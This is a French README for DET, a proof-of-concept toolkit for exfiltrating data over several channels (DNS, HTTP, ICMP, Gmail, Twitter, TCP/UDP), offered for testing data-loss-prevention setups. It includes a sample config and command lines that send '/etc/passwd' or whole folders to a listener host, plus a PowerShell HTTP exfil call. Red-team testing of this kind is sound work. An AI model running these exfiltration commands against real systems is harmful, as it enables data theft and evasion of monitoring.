
(extensible) Data Exfiltration Toolkit (DET)
=======
DET (est fourni EN L'ÉTAT), est une preuve de concept pour réaliser une exfiltration de données en utilisant un ou plusieurs canaux simultanément.
Ceci est une preuve de concept visant à identifier d'éventuelles défaillances de la DLP. Cela ne doit jamais être utilisé pour exfiltrer des données sensibles/réelles (par exemple lors d'une évaluation)
L'idée était de créer une boîte à outils générique pour brancher tout type de protocole/service afin de tester la configuration des solutions de surveillance réseau et de prévention des fuites de données (DLP) mises en œuvre, contre différentes techniques d'exfiltration de données.
Le dépôt principal a maintenant été déplacé ici.
DET a été présenté à BSides Ljubljana le 9 mars 2016 et les diapositives seront disponibles ici. Les diapositives sont disponibles ici.
Clonez le dépôt :
git clone https://github.com/sensepost/DET.git
Ensuite :
pip install -r requirements.txt --user
Pour utiliser DET, vous devrez le configurer et ajouter vos propres paramètres (par exemple SMTP/IMAP, phrase de passe de chiffrement AES256, etc.). Un fichier d'exemple de configuration a été fourni et s'appelle : config-sample.json
{
"plugins": {
"http": {
"target": "192.168.1.101",
"port": 8080
},
"google_docs": {
"target": "192.168.1.101",
"port": 8080,
},
"dns": {
"key": "google.com",
"target": "192.168.1.101",
"port": 53
},
"gmail": {
"username": "[email protected]",
"password": "ReallyStrongPassword",
"server": "smtp.gmail.com",
"port": 587
},
"tcp": {
"target": "192.168.1.101",
"port": 6969
},
"udp": {
"target": "192.168.1.101",
"port": 6969
},
"twitter": {
"username": "PaulWebSec",
"CONSUMER_TOKEN": "XXXXXXXXX",
"CONSUMER_SECRET": "XXXXXXXXX",
"ACCESS_TOKEN": "XXXXXXXXX",
"ACCESS_TOKEN_SECRET": "XXXXXXXXX"
},
"icmp": {
"target": "192.168.1.101"
}
},
"AES_KEY": "THISISACRAZYKEY",
"sleep_time": 10
}
python det.py -h
usage: det.py [-h] [-c CONFIG] [-f FILE] [-d FOLDER] [-p PLUGIN] [-e EXCLUDE]
[-L]
Data Exfiltration Toolkit (SensePost)
optional arguments:
-h, --help show this help message and exit
-c CONFIG Configuration file (eg. '-c ./config-sample.json')
-f FILE File to exfiltrate (eg. '-f /etc/passwd')
-d FOLDER Folder to exfiltrate (eg. '-d /etc/')
-p PLUGIN Plugins to use (eg. '-p dns,twitter')
-e EXCLUDE Plugins to exclude (eg. '-e gmail,icmp')
-L Server mode
Pour charger tous les plugins :
python det.py -L -c ./config.json
Pour charger uniquement les modules twitter et gmail :
python det.py -L -c ./config.json -p twitter,gmail
Pour charger tous les plugins et exclure DNS :
python det.py -L -c ./config.json -e dns
Pour charger tous les plugins :
python det.py -c ./config.json -f /etc/passwd
Pour charger uniquement les modules twitter et gmail :
python det.py -c ./config.json -p twitter,gmail -f /etc/passwd
Pour charger tous les plugins et exclure DNS :
python det.py -c ./config.json -e dns -f /etc/passwd
Et dans PowerShell (module HTTP) :
PS C:\Users\user01\Desktop>
PS C:\Users\user01\Desktop> . .\http_exfil.ps1
PS C:\Users\user01\Desktop> HTTP-exfil 'C:\path\to\file.exe'
Jusqu'à présent, DET prend en charge plusieurs protocoles, listés ici :
Et d'autres 'services' :
Jusqu'à présent, je suis en train d'implémenter de nouveaux modules qui sont presque prêts à être livrés, notamment :
Quelques références/crédits sympas aux personnes dont je me suis inspiré avec leur projet :
Vous pouvez me joindre sur Twitter @PaulWebSec. N'hésitez pas si vous souhaitez contribuer, cloner, forker, soumettre votre PR, etc.
DET est sous licence MIT. Des autorisations au-delà du cadre de cette licence peuvent être disponibles à [email protected]